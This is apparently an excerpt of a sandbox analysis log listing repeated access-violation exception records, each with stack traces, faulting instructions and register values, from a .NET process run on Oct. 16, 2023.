__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7736242 0x7735e68 0x7cf99d 0x7ce9f2 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204796 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204804 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 40628076	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7736242 0x7735e68 0x7cf99d 0x7ce9f2 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204796 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204804 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 42029024	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7737217 0x77369e9 0x7cd37c 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3205680 registers.edi: 3205960 registers.eax: 0 registers.ebp: 3205688 registers.edx: 0 registers.ebx: 3207436 registers.esi: 42596520 registers.ecx: 42603604	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7a8965 0x7a8736 0x7a6cad 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7a8aa0 registers.esp: 3010612 registers.edi: 3010664 registers.eax: 0 registers.ebp: 3010676 registers.edx: 5187880 registers.ebx: 3011884 registers.esi: 41918676 registers.ecx: 0	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74b5c68 0x74b5719 0x74b5635 0x74b3d3b 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009200 registers.edi: 3009484 registers.eax: 0 registers.ebp: 3009208 registers.edx: 0 registers.ebx: 3011884 registers.esi: 42657464 registers.ecx: 43783596	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74b5c68 0x74b5719 0x74b564d 0x74b3d3b 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009200 registers.edi: 3009484 registers.eax: 0 registers.ebp: 3009208 registers.edx: 0 registers.ebx: 3011884 registers.esi: 42657464 registers.ecx: 45089536	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74b5c68 0x74b5719 0x74b564d 0x74b3d3b 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009200 registers.edi: 3009484 registers.eax: 0 registers.ebp: 3009208 registers.edx: 0 registers.ebx: 3011884 registers.esi: 42657464 registers.ecx: 42579456	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74b5c68 0x74ba4e8 0x74b5635 0x74b41d0 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009200 registers.edi: 3009484 registers.eax: 0 registers.ebp: 3009208 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41580804 registers.ecx: 44054464	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74b5c68 0x74ba4e8 0x74b564d 0x74b41d0 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009200 registers.edi: 3009484 registers.eax: 0 registers.ebp: 3009208 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41580804 registers.ecx: 45500280	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74b5c68 0x74ba4e8 0x74b564d 0x74b41d0 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009200 registers.edi: 3009484 registers.eax: 0 registers.ebp: 3009208 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41580804 registers.ecx: 46804880	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bad56 0x74ba7a8 0x74b5635 0x74b44b3 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009160 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009168 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41580804 registers.ecx: 41850872	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bad56 0x74ba7a8 0x74b564d 0x74b44b3 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009160 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009168 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 43200544	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bad56 0x74ba7a8 0x74b564d 0x74b44b3 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009160 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009168 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 44550216	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x74b9b50 0x74bb41a 0x74baff8 0x74b5635 0x74b45b5 0x74b2ffe 0x7ac7af 0x7a6d75 0x7a6886 0x7a34ab 0x7a2f10 0x7a2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74b9b93 registers.esp: 3009224 registers.edi: 3009500 registers.eax: 0 registers.ebp: 3009232 registers.edx: 0 registers.ebx: 3011884 registers.esi: 41576572 registers.ecx: 45899952	1
